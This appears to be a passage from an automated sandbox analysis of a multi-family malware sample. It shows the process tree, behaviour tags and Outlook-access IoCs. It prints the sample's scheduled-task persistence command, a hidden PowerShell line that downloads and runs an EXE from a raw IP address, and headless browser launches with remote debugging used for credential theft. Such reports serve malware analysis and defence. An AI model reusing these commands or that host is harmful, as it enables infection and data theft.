4312 wrote to memory of 2948 4312 ibC8xs1.exe 109 PID 4312 wrote to memory of 2948 4312 ibC8xs1.exe 109 PID 2948 wrote to memory of 4592 2948 csc.exe 111 PID 2948 wrote to memory of 4592 2948 csc.exe 111 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4312 wrote to memory of 2412 4312 ibC8xs1.exe 112 PID 4988 wrote to memory of 4368 4988 cmd.exe 116 PID 4988 wrote to memory of 4368 4988 cmd.exe 116 PID 3424 wrote to memory of 4936 3424 explorer.exe 118 PID 3424 wrote to memory of 4936 3424 explorer.exe 118 PID 4936 wrote to memory of 3748 4936 exp.exe 122 PID 4936 wrote to memory of 3748 4936 exp.exe 122 PID 3748 wrote to memory of 4972 3748 csc.exe 124 PID 3748 wrote to memory of 4972 3748 csc.exe 124 PID 4936 wrote to memory of 3800 4936 exp.exe 125 PID 4936 wrote to memory of 3800 4936 exp.exe 125 PID 4936 wrote to memory of 3800 4936 exp.exe 125 PID 4936 wrote to memory of 2240 4936 exp.exe 126 PID 4936 wrote to memory of 2240 4936 exp.exe 126 PID 4936 wrote to memory of 2240 4936 exp.exe 126 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 PID 4936 wrote to memory of 4920 4936 exp.exe 127 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YLKBymaIYpz /tr "mshta C:\Users\Admin\AppData\Local\Temp\NX4plKm5Y.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YLKBymaIYpz /tr "mshta C:\Users\Admin\AppData\Local\Temp\NX4plKm5Y.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2824
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\NX4plKm5Y.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Users\Admin\AppData\Local\TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE"C:\Users\Admin\AppData\Local\TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cedifdwu\cedifdwu.cmdline"7⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB07.tmp" "c:\Users\Admin\AppData\Local\Temp\cedifdwu\CSCDB88C0EE9B144AC9ACDCC317486D288.TMP"8⤵PID:4592
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Downloads MZ/PE file
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:2412 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1376
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe--restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4728 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffbb3b4dcf8,0x7ffbb3b4dd04,0x7ffbb3b4dd109⤵PID:1948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2568,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2564 /prefetch:39⤵PID:3704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2464,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2456 /prefetch:29⤵PID:244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2612,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2608 /prefetch:89⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:19⤵
- Uses browser remote debugging
PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3272 /prefetch:19⤵
- Uses browser remote debugging
PID:708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:29⤵
- Uses browser remote debugging
PID:4804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4644 /prefetch:19⤵
- Uses browser remote debugging
PID:3464
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6060 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbb2d6f208,0x7ffbb2d6f214,0x7ffbb2d6f2209⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2212,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:39⤵PID:5380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:29⤵PID:2748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2524,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:89⤵PID:5348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3620,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:19⤵
- Uses browser remote debugging
PID:1740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3656,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:19⤵
- Uses browser remote debugging
PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:19⤵
- Uses browser remote debugging
PID:5700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4236,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:29⤵
- Uses browser remote debugging
PID:5696
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6040
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5688
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5260
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5740
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3340
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2200
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5720
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:4488
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5456
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2436
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5284
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5812
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3748 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqtq4la2\cqtq4la2.cmdline"7⤵PID:4848
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E19.tmp" "c:\Users\Admin\AppData\Local\Temp\cqtq4la2\CSC6AA6D74395FA4BA0893B5F2F1BDD3A52.TMP"8⤵PID:4868
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4716
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\10492200101\Clickthis.exe"C:\Users\Admin\AppData\Local\Temp\10492200101\Clickthis.exe"6⤵
- Executes dropped EXE
PID:5216 -
C:\Users\Admin\AppData\Local\Temp\ade23ea5f364115a778c64d6280c8b6d\444.exeC:\Users\Admin\AppData\Local\Temp\ade23ea5f364115a778c64d6280c8b6d\444.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
- System Location Discovery: System Language Discovery
PID:3376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 11809⤵
- Program crash
PID:5492
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492420101\X3vNPr9.exe"C:\Users\Admin\AppData\Local\Temp\10492420101\X3vNPr9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2112 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:788 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5672
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492730101\2edfcc2a37.exe"C:\Users\Admin\AppData\Local\Temp\10492730101\2edfcc2a37.exe"6⤵
- Executes dropped EXE
PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\10492740101\ff7091b049.exe"C:\Users\Admin\AppData\Local\Temp\10492740101\ff7091b049.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10492750101\Nehh6wZ.exe"C:\Users\Admin\AppData\Local\Temp\10492750101\Nehh6wZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5360 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5628
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492770101\qhjMWht.exe"C:\Users\Admin\AppData\Local\Temp\10492770101\qhjMWht.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5640
-
-
C:\Users\Admin\AppData\Local\Temp\10492780101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10492780101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\10492790101\AfkeY2q.exe"C:\Users\Admin\AppData\Local\Temp\10492790101\AfkeY2q.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5240
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10492800271\ArFLIYD.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\10492810101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10492810101\9sWdA2p.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:976
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:4368
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n52nougf\n52nougf.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2601.tmp" "c:\Users\Admin\AppData\Local\Temp\n52nougf\CSC8FC3552565D4471B849F71F4237F938.TMP"4⤵PID:4972
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:2240
-
-
